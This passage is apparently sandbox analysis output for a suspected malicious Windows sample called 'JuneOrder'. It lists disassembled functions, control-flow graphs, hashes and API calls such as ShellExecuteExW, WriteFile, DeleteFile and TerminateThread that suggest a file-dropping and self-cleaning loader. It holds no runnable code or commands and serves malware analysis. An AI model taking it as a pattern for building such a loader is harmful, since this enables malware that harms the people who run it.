                                        • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                        • String ID:
                                        • API String ID: 1272335518-0
                                        • Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                        • Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
                                        • Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                        • Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 580 402022-402024 581 402029-402034 580->581 581->581 582 402036-4020ac call 40dfc0 call 405060 * 3 ShellExecuteExW 581->582 591 4020b0-4020cd call 405532 GetExitCodeProcess 582->591 594 4020dd 591->594 595 4020cf-4020d9 591->595 594->591 595->594 596 4020db-402106 call 40df50 * 3 595->596
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CodeExecuteExitProcessShell
                                        • String ID: open
                                        • API String ID: 1016612177-2758837156
                                        • Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                        • Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
                                        • Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                        • Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                          • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                                          • Part of subcall function 00409698: memmove.MSVCRT ref: 004096DA
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                        • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                        • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                        • String ID:
                                        • API String ID: 983379767-0
                                        • Opcode ID: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                        • Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
                                        • Opcode Fuzzy Hash: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                        • Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 749 40b020-40b034 750 40b127-40b12d 749->750 751 40b03a-40b03e 749->751 752 40b040-40b068 SetFilePointer 751->752 753 40b06b-40b075 751->753 752->753 754 40b077-40b082 753->754 755 40b0e8-40b0f3 call 40aa40 753->755 756 40b0d3-40b0e5 754->756 757 40b084-40b085 754->757 764 40b115-40b122 755->764 765 40b0f5-40b112 WriteFile 755->765 759 40b087-40b08a 757->759 760 40b0bc-40b0d0 757->760 762 40b0a7-40b0b9 759->762 763 40b08c-40b08d 759->763 766 40b091-40b0a4 memcpy 763->766 764->766
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
                                        • memcpy.MSVCRT ref: 0040B092
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: FilePointermemcpy
                                        • String ID:
                                        • API String ID: 1104741977-0
                                        • Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                        • Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
                                        • Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                        • Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 767 40dec0-40dee7 TlsGetValue 768 40df06-40df25 RtlReAllocateHeap 767->768 769 40dee9-40df04 RtlAllocateHeap 767->769 770 40df27-40df4d call 40e3a0 768->770 769->770
                                        APIs
                                        • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                        • RtlReAllocateHeap.NTDLL(02250000,00000000,?,?), ref: 0040DF1C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocateHeap$Value
                                        • String ID:
                                        • API String ID: 2497967046-0
                                        • Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                        • Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
                                        • Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                        • Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 773 40a6c5-40a6d2 774 40a6d4-40a706 wcsncpy wcslen 773->774 775 40a73d 773->775 776 40a71e-40a726 774->776 777 40a73f-40a742 775->777 778 40a708-40a70f 776->778 779 40a728-40a73b CreateDirectoryW 776->779 780 40a711-40a714 778->780 781 40a71b 778->781 779->777 780->781 782 40a716-40a719 780->782 781->776 782->779 782->781
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CreateDirectorywcslenwcsncpy
                                        • String ID:
                                        • API String ID: 961886536-0
                                        • Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                        • Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
                                        • Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                        • Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 783 408dee-408e26 memset InitCommonControlsEx CoInitialize
                                        APIs
                                        • memset.MSVCRT ref: 00408DFB
                                        • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                        • CoInitialize.OLE32(00000000), ref: 00408E1D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CommonControlsInitInitializememset
                                        • String ID:
                                        • API String ID: 2179856907-0
                                        • Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                        • Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
                                        • Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                        • Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 784 40adc0-40add9 call 40d498 787 40ae6e-40ae73 784->787 788 40addf-40adfe CreateFileW 784->788 789 40ae00-40ae02 788->789 790 40ae52-40ae55 788->790 789->790 791 40ae04-40ae0b 789->791 792 40ae57 790->792 793 40ae59-40ae60 call 40d40a 790->793 795 40ae20 791->795 796 40ae0d-40ae1e HeapAlloc 791->796 792->793 797 40ae65-40ae6b 793->797 798 40ae23-40ae4a 795->798 796->798 799 40ae4c 798->799 800 40ae4e-40ae50 798->800 799->800 800->790 800->797
                                        APIs
                                          • Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                          • Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
                                        • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                        • String ID:
                                        • API String ID: 3705299215-0
                                        • Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                        • Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
                                        • Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                        • Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 801 40dbca-40dbe1 call 40dd1d 804 40dbe7-40dc04 RtlAllocateHeap 801->804 805 40dc69-40dc6e 801->805 806 40dc06-40dc4c memset call 411a64 804->806 807 40dc68 804->807 806->807 810 40dc4e-40dc50 806->810 807->805 810->807 811 40dc52-40dc54 810->811 812 40dc58-40dc62 call 411e8f 811->812 815 40dc64 812->815 815->807
                                        APIs
                                          • Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E
                                        • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                        • memset.MSVCRT ref: 0040DC35
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Heap$AllocateFreememset
                                        • String ID:
                                        • API String ID: 2774703448-0
                                        • Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                        • Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
                                        • Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                        • Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 816 40a9d0-40a9d8 817 40a9e9-40a9fa call 40d459 816->817 818 40a9da-40a9e6 call 40d9f5 816->818 823 40a9fc-40aa00 817->823 824 40aa2d-40aa2f 817->824 825 40aa02-40aa13 call 40aa40 HeapFree 823->825 826 40aa19-40aa28 FindCloseChangeNotification call 40d40a 823->826 825->826 826->824
                                        APIs
                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindFreeHeapNotification
                                        • String ID:
                                        • API String ID: 1642550653-0
                                        • Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                        • Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
                                        • Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                        • Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D
                                        APIs
                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402000
                                        • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040200B
                                          • Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D7
                                          • Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                          • Part of subcall function 00405436: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                          • Part of subcall function 00405436: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                        • String ID:
                                        • API String ID: 1205394408-0
                                        • Opcode ID: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                        • Instruction ID: f8114c552bbb016f0a76c43bd4124e9f0fb198a1ce0b642fe03d48e839951556
                                        • Opcode Fuzzy Hash: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                        • Instruction Fuzzy Hash: 36F0C030414505AADA257B32EC8299A7E36EB08308B42C43FF440714F2CF3E9D69AE5D
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                        • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                          • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02250000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
                                          • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02250000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
                                          • Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocHeap$CreateValue
                                        • String ID:
                                        • API String ID: 493873155-0
                                        • Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                        • Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
                                        • Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                        • Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C
                                        APIs
                                        • SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,02259F70,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
                                        • DeleteFileW.KERNELBASE(00000000,0040A7F2,02259F70,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: File$AttributesDelete
                                        • String ID:
                                        • API String ID: 2910425767-0
                                        • Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                        • Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
                                        • Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                        • Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A
                                        APIs
                                        • HeapDestroy.KERNELBASE(02250000,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE69
                                        • TlsFree.KERNELBASE(0000000D,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE76
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: DestroyFreeHeap
                                        • String ID:
